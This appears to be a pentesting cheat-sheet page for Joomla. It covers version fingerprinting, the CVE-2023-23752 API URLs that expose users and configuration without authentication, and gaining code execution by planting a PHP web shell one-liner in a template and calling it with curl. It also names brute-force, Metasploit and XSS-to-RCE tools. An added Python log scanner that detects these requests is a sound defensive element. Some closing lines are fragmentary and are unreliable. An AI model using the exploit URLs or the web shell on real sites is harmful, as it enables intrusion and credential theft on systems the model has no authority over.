Joomla
Joomla collects some anonymous usage statistics, such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.
Check the meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml you can see the version.
In /language/en-GB/en-GB.xml you can get the version of Joomla.
In plugins/system/cache/cache.xml you can see an approximate version.
Versions from 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure (CVE-2023-23752) that will dump credentials and other information.
Users: http://<host>/api/v1/users?public=true
Config File: http://<host>/api/index.php/v1/config/application?public=true
If you have obtained admin credentials, you can gain RCE by adding a snippet of PHP code to the site. We can do this by customizing a template.
Click on Templates on the bottom left under Configuration to pull up the templates menu.
Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:
system($_GET['cmd']);
Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
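For detection, the two request shapes described above (the CVE-2023-23752 API calls carrying a `public` parameter, and a template PHP file requested directly with a query string) can be found in web server access logs. The following is an added example, not part of the original page: the rule names, the Combined Log Format assumption, the status-code interpretation and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Joomla API routes, with or without index.php, as in the two URLs above.
API_RE = re.compile(r'^/api/(?:index\.php/)?v1/')
# A PHP file inside a template directory, e.g. /templates/protostar/error.php.
TEMPLATE_PHP_RE = re.compile(r'^/templates/[^/]+/.+\.php$')


def classify(line):
    """Return (client, rule, target) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    # CVE-2023-23752 request shape. Any value of "public" is flagged, which is
    # deliberately broader than the literal public=true shown above.
    if API_RE.match(url.path) and "public" in params:
        # Assumption: a 200 means data was served; other codes are probes.
        rule = "api-public-served" if status == "200" else "api-public-probe"
        return (client, rule, target)
    # Heuristic (assumption): template PHP files are not normally requested
    # directly with parameters, so a query string suggests an edited template.
    if TEMPLATE_PHP_RE.match(url.path) and params:
        return (client, "template-php-with-params", target)
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2023:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1984 "-" "curl/7.88"',
    '203.0.113.7 - - [10/Mar/2023:10:01:03 +0000] "GET /api/v1/users?public=true HTTP/1.1" 401 96 "-" "curl/7.88"',
    '198.51.100.20 - - [10/Mar/2023:11:15:40 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.88"',
    '192.0.2.5 - - [10/Mar/2023:11:16:00 +0000] "GET /templates/protostar/css/template.css?v=3 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [10/Mar/2023:11:16:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 15320 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, rule, target in scan(SAMPLE):
        print(f"{rule:26} {client:15} {target}")
```

An `api-public-served` hit on a host running 4.0.0 to 4.2.7 means the configuration, including database credentials, should be treated as exposed and rotated.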
In that can scan Joomla.
MSF Module: scanner/http/joomla_api_improper_access_checks
or ruby script:
You can use this to attempt to brute force the login.
Joomla exploitation script that elevates XSS to RCE or other critical vulnerabilities. It supports Joomla versions 5.X.X, 4.X.X, and 3.X.X, and allows you to:
Privilege Escalation: Creates a user in Joomla.
(RCE) Built-In Templates Edit: Edits a built-in template in Joomla.
(Custom) Custom Exploits: Custom exploits for third-party Joomla plugins.